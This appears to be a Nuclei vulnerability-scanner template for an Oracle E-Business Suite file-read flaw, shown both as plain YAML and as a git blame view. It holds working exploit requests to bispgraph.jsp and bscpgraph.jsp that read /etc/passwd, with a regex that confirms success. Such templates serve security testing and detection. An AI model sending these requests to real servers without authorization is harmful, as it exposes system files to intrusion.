nuclei-templates/vulnerabilities/oracle/oracle-ebs-bispgraph-file-a...

id: oracle-ebs-bispgrapgh-file-read

info:
  name: Oracle EBS Bispgraph File Access
  author: "@emenalf & @tirtha_mandal"
  severity: critical

requests:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
      - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
updating template 2020-07-28 15:14:22 +00:00			`id: oracle-ebs-bispgrapgh-file-read`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00
trailing-spaces 2020-07-31 10:02:19 +00:00			`info:`
updating template 2020-07-28 15:14:22 +00:00			`name: Oracle EBS Bispgraph File Access`
template update 2020-10-07 22:19:59 +00:00			`author: "@emenalf & @tirtha_mandal"`
uniform format 2020-08-31 18:34:29 +00:00			`severity: critical`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00
updating template 2020-07-28 15:14:22 +00:00			`requests:`
			`- method: GET`
trailing-spaces 2020-07-31 10:02:19 +00:00			`path:`
updating template 2020-07-28 15:14:22 +00:00			`- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"`
template update 2020-10-07 22:19:59 +00:00			`- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"`
updating template 2020-07-28 15:14:22 +00:00
trailing-spaces 2020-07-31 10:02:19 +00:00			`matchers:`
updating template 2020-07-28 15:14:22 +00:00			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`